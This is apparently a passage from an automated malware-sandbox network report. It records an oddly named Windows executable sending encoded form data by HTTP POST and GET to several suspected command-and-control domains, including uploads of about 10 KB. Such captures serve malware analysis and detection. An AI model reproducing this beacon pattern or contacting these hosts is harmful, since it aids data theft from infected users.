                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 64 62 2b 2b 59 56 64 65 46 36 5a 64 2f 50 49 64 30 52 55 7a 48 7a 53 50 44 4c 79 62 6e 69 2b 46 42 39 5a 47 78 7a 63 71 66 37 49 79 75 6b 6f 72 4f 7a 47 77 61 63 6d 33 36 64 56 45 53 74 58 45 65 70 2b 64 41 46 6b 76 5a 45 34 2b 58 41 56 6e 30 38 47 4a 45 70 64 72 64 77 4e 68 54 65 42 2b 58 72 31 41 37 6b 38 65 71 6c 43 6a 70 65 6f 35 59 44 4b 55 6e 72 44 70 55 31 55 6c 6c 7a 6e 36 2b 57 6f 7a 39 71 4c 6e 53 64 69 46 52 57 66 33 4f 6b 69 38 35 4c 33 35 6b 55 32 32 7a 31 7a 4d 50 58 4a 52 4d 56 43 30 41 4a 36 4b 53 4b 6b 4a 62 71 2f 6c 32 68 46 71 4c 47 75 5a 39 65 44 4b 7a 77 3d 3d
                                                        Data Ascii: wrRLLPUh=db++YVdeF6Zd/PId0RUzHzSPDLybni+FB9ZGxzcqf7IyukorOzGwacm36dVEStXEep+dAFkvZE4+XAVn08GJEpdrdwNhTeB+Xr1A7k8eqlCjpeo5YDKUnrDpU1Ullzn6+Woz9qLnSdiFRWf3Oki85L35kU22z1zMPXJRMVC0AJ6KSKkJbq/l2hFqLGuZ9eDKzw==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.44976944.213.25.70803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:07.272412062 CEST809OUTPOST /72tr/ HTTP/1.1
                                                        Host: www.newdaydawning.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.newdaydawning.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.newdaydawning.net/72tr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 64 62 2b 2b 59 56 64 65 46 36 5a 64 2f 72 30 64 32 33 63 7a 57 44 53 4d 47 4c 79 62 2b 53 2b 65 42 39 46 47 78 79 6f 63 63 49 73 79 75 46 59 72 4a 33 53 77 4b 4d 6d 33 69 74 56 46 57 74 58 62 65 70 7a 69 41 48 67 76 5a 41 6f 2b 58 41 6c 6e 30 75 75 47 46 35 64 70 45 67 4e 5a 58 65 42 2b 58 72 31 41 37 6b 5a 31 71 6c 61 6a 71 75 59 35 5a 6e 65 58 71 4c 44 6f 54 31 55 6c 68 7a 6e 41 2b 57 6f 64 39 6f 76 64 53 65 4b 46 52 57 76 33 4f 56 69 6a 79 4c 33 2f 71 30 33 4a 7a 56 65 2b 58 6e 74 41 48 55 47 59 42 34 62 76 54 4d 31 54 4b 62 65 79 6b 68 68 5a 57 42 6e 74 77 64 2b 44 6f 30 6b 42 4d 6d 74 33 38 74 4d 69 61 67 78 49 6e 2f 79 6f 76 44 49 3d
                                                        Data Ascii: wrRLLPUh=db++YVdeF6Zd/r0d23czWDSMGLyb+S+eB9FGxyoccIsyuFYrJ3SwKMm3itVFWtXbepziAHgvZAo+XAln0uuGF5dpEgNZXeB+Xr1A7kZ1qlajquY5ZneXqLDoT1UlhznA+Wod9ovdSeKFRWv3OVijyL3/q03JzVe+XntAHUGYB4bvTM1TKbeykhhZWBntwd+Do0kBMmt38tMiagxIn/yovDI=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.44977044.213.25.70803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:09.825861931 CEST10891OUTPOST /72tr/ HTTP/1.1
                                                        Host: www.newdaydawning.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.newdaydawning.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.newdaydawning.net/72tr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 64 62 2b 2b 59 56 64 65 46 36 5a 64 2f 72 30 64 32 33 63 7a 57 44 53 4d 47 4c 79 62 2b 53 2b 65 42 39 46 47 78 79 6f 63 63 49 6b 79 75 33 38 72 50 51 75 77 4a 4d 6d 33 72 4e 56 49 57 74 58 53 65 70 61 72 41 48 73 52 5a 43 67 2b 59 42 46 6e 6c 71 36 47 4c 4a 64 70 4d 41 4e 69 54 65 41 6b 58 72 46 45 37 6b 70 31 71 6c 61 6a 71 6f 63 35 50 44 4b 58 35 37 44 70 55 31 55 70 6c 7a 6d 4f 2b 57 52 67 39 6f 36 2f 53 75 71 46 52 32 2f 33 64 33 36 6a 75 62 33 39 70 30 33 52 7a 56 53 6c 58 6e 77 73 48 55 79 32 42 34 76 76 52 59 45 58 5a 34 53 57 77 79 52 55 48 77 58 30 39 71 57 79 6b 6e 55 31 4d 55 56 65 34 2f 4d 53 59 6a 67 35 77 39 61 6a 38 58 34 67 44 65 49 33 41 52 37 74 41 54 6a 48 47 45 39 78 64 32 50 51 30 4a 52 52 66 2b 4a 35 6b 6c 65 6f 4f 54 75 68 44 47 64 47 68 4c 52 44 73 49 50 68 36 68 48 75 62 32 61 4f 38 63 63 45 4e 34 58 75 47 75 71 75 76 6e 4c 43 74 36 71 55 56 2b 56 44 77 56 53 47 68 65 75 38 4b 70 55 55 64 72 49 2b 5a 35 69 36 68 37 4d 55 6f 51 56 65 78 30 72 6f 50 [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=db++YVdeF6Zd/r0d23czWDSMGLyb+S+eB9FGxyoccIkyu38rPQuwJMm3rNVIWtXSeparAHsRZCg+YBFnlq6GLJdpMANiTeAkXrFE7kp1qlajqoc5PDKX57DpU1UplzmO+WRg9o6/SuqFR2/3d36jub39p03RzVSlXnwsHUy2B4vvRYEXZ4SWwyRUHwX09qWyknU1MUVe4/MSYjg5w9aj8X4gDeI3AR7tATjHGE9xd2PQ0JRRf+J5kleoOTuhDGdGhLRDsIPh6hHub2aO8ccEN4XuGuquvnLCt6qUV+VDwVSGheu8KpUUdrI+Z5i6h7MUoQVex0roPRJ+JfbRAkmGCo45DFOna9+lnibizL2/IXPtINyp0QlEy6by4Ccfn/cbWkQgducGf/N3Vvk6fM+tl6oQAR4IAUL7qfX0y+Rkye3EvpNb0jan+rGX7h+0OYE5rnNvL1sXEvXRUCZ3bOCQDh+/HMAkM/Gy/W1hTWiLjZFnNiJv+jp5KR27zSZzB+nsSdU/ovYyzwH9z6LqkfwWI1qLxIo81eWfTn6GqWfByxEjUhZe+O/uVTzrxLIFdHSJkttZrDAoqsZMIUIf96B3kcKxZwNsXui4oYCv4uz/sxEbiWMHTxqy3Nx/7igSuyRNY50rGFdHugDDct6xpAqyB1uyUZ0cp6yKnIfkvgwoFI+ShW1LLV/D/VBCdTWb35P0tnfQYNjiYFXOiZWMSua2bb5f1kZPDftldhDOw9lfZf4rewNqHvgt0TGebKW54/3xb/oti+DVEWfmyQEKyN7v/IMqA8NJbrrmTZahT4d0+iPQR0kLoaaLYH+/FAEYxfAWJ32X5tlsC7lKMsYpLnwtJ/0qKhduoUTs4Be7JpO3a/yftmdT5F88IWVjWQ9RUHhOYw4RvUIZIG3QjeVhLI+D0IgJOyWld0Z9yLrEA+MpzgDmFb8bgQY5qX+/l2dA1GcW5zl39TLYXCAXo3UzDuNnrQJu/ou2XzBAPnJoKfA9Lkx [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.44977144.213.25.70803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:12.367161989 CEST521OUTGET /72tr/?wrRLLPUh=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=&IH=BP3PrJvHc6MXcF HTTP/1.1
                                                        Host: www.newdaydawning.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:21:13.874156952 CEST483INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 26 Sep 2024 13:21:12 GMT
                                                        Server: Apache
                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                        X-Redirect-By: WordPress
                                                        Location: http://newdaydawning.net/72tr/?wrRLLPUh=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=&IH=BP3PrJvHc6MXcF
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        Content-Type: text/html; charset=UTF-8
                                                        Sep 26, 2024 15:21:13.896977901 CEST5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.4497723.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:27.034773111 CEST768OUTPOST /2mtz/ HTTP/1.1
                                                        Host: www.o731lh.vip
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.o731lh.vip
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.o731lh.vip/2mtz/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 46 64 77 53 44 6f 33 6f 30 55 35 58 74 32 70 44 42 49 44 74 66 6b 75 74 73 4c 2f 73 35 4f 4e 75 42 61 6a 66 4a 7a 46 67 52 53 4b 51 34 71 43 4e 54 78 71 55 53 64 7a 65 68 43 6e 46 4d 36 78 48 46 62 47 56 39 2b 47 62 65 53 4f 38 78 30 4a 41 70 43 75 6b 4f 50 49 78 39 52 39 74 4a 7a 78 76 4a 55 6a 69 36 76 38 6a 48 55 6c 70 39 56 55 44 53 44 4a 75 42 48 52 33 64 47 48 32 4b 6f 4c 38 63 64 46 6c 51 4d 4c 41 73 50 43 32 2b 61 58 54 35 43 65 61 41 6f 4b 68 76 37 48 49 59 55 6e 6a 43 67 51 4c 6f 4b 37 36 6d 69 34 37 46 72 74 4e 75 57 31 53 65 51 42 30 65 61 53 4b 49 77 74 6b 44 67 3d 3d
                                                        Data Ascii: wrRLLPUh=FdwSDo3o0U5Xt2pDBIDtfkutsL/s5ONuBajfJzFgRSKQ4qCNTxqUSdzehCnFM6xHFbGV9+GbeSO8x0JApCukOPIx9R9tJzxvJUji6v8jHUlp9VUDSDJuBHR3dGH2KoL8cdFlQMLAsPC2+aXT5CeaAoKhv7HIYUnjCgQLoK76mi47FrtNuW1SeQB0eaSKIwtkDg==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.4497733.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:29.591430902 CEST788OUTPOST /2mtz/ HTTP/1.1
                                                        Host: www.o731lh.vip
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.o731lh.vip
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.o731lh.vip/2mtz/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 46 64 77 53 44 6f 33 6f 30 55 35 58 75 58 5a 44 41 72 37 74 61 45 75 69 67 72 2f 73 32 75 4d 6e 42 61 76 66 4a 33 55 74 51 68 2b 51 35 4c 79 4e 53 79 79 55 66 39 7a 65 35 53 6e 45 52 71 78 4d 46 62 43 64 39 38 53 62 65 53 61 38 78 31 35 41 6f 78 32 6e 4f 66 49 33 32 78 39 6a 45 54 78 76 4a 55 6a 69 36 76 35 45 48 55 39 70 39 45 45 44 55 6d 39 78 66 33 52 32 61 47 48 32 4f 6f 4c 34 63 64 46 4c 51 4f 2f 71 73 4d 36 32 2b 66 54 54 35 54 65 46 4b 6f 4b 6e 68 62 47 34 55 6c 2b 4e 43 54 70 47 76 37 65 64 74 68 77 49 45 74 38 58 2f 6e 55 46 4d 51 6c 48 44 64 62 2b 46 7a 51 74 59 6c 39 30 39 70 76 69 57 5a 2f 65 31 45 43 5a 37 5a 50 74 4f 71 41 3d
                                                        Data Ascii: wrRLLPUh=FdwSDo3o0U5XuXZDAr7taEuigr/s2uMnBavfJ3UtQh+Q5LyNSyyUf9ze5SnERqxMFbCd98SbeSa8x15Aox2nOfI32x9jETxvJUji6v5EHU9p9EEDUm9xf3R2aGH2OoL4cdFLQO/qsM62+fTT5TeFKoKnhbG4Ul+NCTpGv7edthwIEt8X/nUFMQlHDdb+FzQtYl909pviWZ/e1ECZ7ZPtOqA=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.4497743.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:32.135936022 CEST10870OUTPOST /2mtz/ HTTP/1.1
                                                        Host: www.o731lh.vip
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.o731lh.vip
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.o731lh.vip/2mtz/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 46 64 77 53 44 6f 33 6f 30 55 35 58 75 58 5a 44 41 72 37 74 61 45 75 69 67 72 2f 73 32 75 4d 6e 42 61 76 66 4a 33 55 74 51 68 6d 51 34 39 4f 4e 53 53 4f 55 65 39 7a 65 31 79 6e 2f 52 71 78 52 46 61 6d 5a 39 38 50 67 65 52 69 38 77 54 74 41 35 30 43 6e 41 66 49 33 35 52 39 75 4a 7a 78 41 4a 55 7a 6d 36 73 52 45 48 55 39 70 39 48 4d 44 44 6a 4a 78 64 33 52 33 64 47 48 78 4b 6f 4c 41 63 64 74 39 51 4e 54 51 73 63 61 32 2f 2f 44 54 36 68 32 46 47 6f 4b 6c 73 37 47 67 55 6c 43 4f 43 54 31 67 76 37 72 36 74 6d 77 49 48 6f 38 49 6b 57 49 79 57 68 46 67 59 36 7a 59 47 43 30 75 58 56 45 52 36 35 48 48 4f 4b 54 52 74 48 66 6f 2f 6f 66 6c 58 39 2f 75 56 68 4c 72 37 72 2b 4d 62 67 49 48 48 45 46 38 4c 69 74 5a 52 51 32 4b 58 74 6c 76 39 52 34 67 37 52 58 72 73 6d 53 46 57 70 79 39 50 50 4c 46 4a 37 49 58 36 52 4e 33 74 44 35 76 4c 69 42 6e 64 70 6b 2b 31 59 59 67 72 50 45 42 49 77 74 64 6b 6c 33 65 63 63 7a 64 32 6b 4e 6d 6c 61 70 42 45 6a 42 6c 31 55 64 61 32 67 72 32 6b 61 6e 72 4d [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=FdwSDo3o0U5XuXZDAr7taEuigr/s2uMnBavfJ3UtQhmQ49ONSSOUe9ze1yn/RqxRFamZ98PgeRi8wTtA50CnAfI35R9uJzxAJUzm6sREHU9p9HMDDjJxd3R3dGHxKoLAcdt9QNTQsca2//DT6h2FGoKls7GgUlCOCT1gv7r6tmwIHo8IkWIyWhFgY6zYGC0uXVER65HHOKTRtHfo/oflX9/uVhLr7r+MbgIHHEF8LitZRQ2KXtlv9R4g7RXrsmSFWpy9PPLFJ7IX6RN3tD5vLiBndpk+1YYgrPEBIwtdkl3ecczd2kNmlapBEjBl1Uda2gr2kanrMoPxSoFtQeGwnIerSPPpfJsNZogixuvhDnGNvk6lnt/4HLvwVyMuhrNwr1FpASEOJZqFjyiRyxMnrFES+K9DRQCgOJMYaSU+sJPDftoLSgzo2dBEx+I7zKfw1ZEkFdkB/2EMKMmrYJBXNRivFp744rAsA6kwEmpy5SUcMslhK4rSSvxY1JNGxexWKyzamKI8Tl7IIF3+dUnK5CxegdtwNsLGfpvx0TxpXUAVyHve26+VopY8kF1YzUNzlBlhP9CduhmqV8SQauWimLlCtfOR3izYUKFaLlwvEKSVMcvBtsXkWfVqQonrRO6MoPD+QNdiZjk8g1qNUKUyAv3AwOGJQ7zUhoC7H5QhKmCFroTk+CLZiktuXq61n+Vyx6twmbzIjWxsy36xk0+KqLM+B0rCNDAz/AQEh9JeyL+fedLVXBjfMEcaOjPsW8Wptzi98mcHL30s1RYoNfDuuMvC9qwwhKK+lIFZClOcWUUymBC9eY0rwq92LPj1P1egLd0WJNbpgaNnl0JXPAaCzUFW8bD6/1+RWaMWXJMu4Kx55ZUuiPLtLhPSjz5YBZ9/Gi0g13oulOmO/+EJV4bv4Q4R2f6gWBOdTLpg+NfzNzF+jkAFb30FvoBC0XlHsxutdDfWXgOyOa2SrG6gVmlBAAsK42LpI9G3VZHXz6YZ403 [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.4497753.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:34.678041935 CEST514OUTGET /2mtz/?IH=BP3PrJvHc6MXcF&wrRLLPUh=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0= HTTP/1.1
                                                        Host: www.o731lh.vip
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:21:35.143770933 CEST402INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Thu, 26 Sep 2024 13:21:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 262
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 48 3d 42 50 33 50 72 4a 76 48 63 36 4d 58 63 46 26 77 72 52 4c 4c 50 55 68 3d 49 66 59 79 41 64 47 56 71 47 31 35 2b 57 31 65 57 4a 43 78 53 30 4f 52 74 34 6e 75 36 49 59 31 44 36 32 42 64 42 41 6c 55 67 2b 33 34 34 65 4d 4e 43 7a 4a 4c 66 79 35 6a 77 7a 6e 47 4a 68 70 4e 73 2f 50 39 73 69 79 5a 53 53 34 78 6b 39 74 76 78 4b 35 65 65 38 70 34 68 4a 61 47 44 39 4c 66 6c 7a 43 78 2f 51 62 45 6e 4e 72 74 33 30 65 56 67 52 63 65 47 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IH=BP3PrJvHc6MXcF&wrRLLPUh=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0="}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.44977644.207.39.65803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:40.479233980 CEST762OUTPOST /zl4r/ HTTP/1.1
                                                        Host: www.wajf.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.wajf.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.wajf.net/zl4r/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 6e 43 61 54 77 75 7a 66 63 54 2b 31 6a 51 49 41 57 62 5a 4c 4c 64 64 6e 32 39 4c 32 36 4b 6f 63 4b 44 65 63 56 6d 64 63 76 39 6e 75 44 57 32 56 55 51 72 65 75 75 68 74 57 46 4a 4a 4b 45 35 2f 48 74 6f 72 4e 6e 4a 72 4a 59 66 79 77 55 41 62 4b 6b 41 52 65 58 53 43 47 72 41 48 55 6f 44 75 4f 4e 56 6d 4a 6d 4a 33 79 6a 67 6a 33 6b 46 68 4b 48 67 37 65 78 50 4f 41 41 64 43 57 6d 6a 4b 57 33 72 55 38 43 65 6d 57 48 50 76 68 6e 77 78 35 44 75 38 47 46 6d 68 45 46 38 79 6b 43 79 36 61 47 73 59 44 78 78 6d 37 48 66 78 38 31 65 2f 6b 50 44 70 66 62 35 4c 63 31 4a 6b 62 4b 7a 74 79 77 3d 3d
                                                        Data Ascii: wrRLLPUh=nCaTwuzfcT+1jQIAWbZLLddn29L26KocKDecVmdcv9nuDW2VUQreuuhtWFJJKE5/HtorNnJrJYfywUAbKkAReXSCGrAHUoDuONVmJmJ3yjgj3kFhKHg7exPOAAdCWmjKW3rU8CemWHPvhnwx5Du8GFmhEF8ykCy6aGsYDxxm7Hfx81e/kPDpfb5Lc1JkbKztyw==
                                                        Sep 26, 2024 15:21:40.926505089 CEST1236INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 13:21:40 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                        Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                        Sep 26, 2024 15:21:40.926816940 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                                        Sep 26, 2024 15:21:40.926836014 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                        Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                                        Sep 26, 2024 15:21:40.928113937 CEST672INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
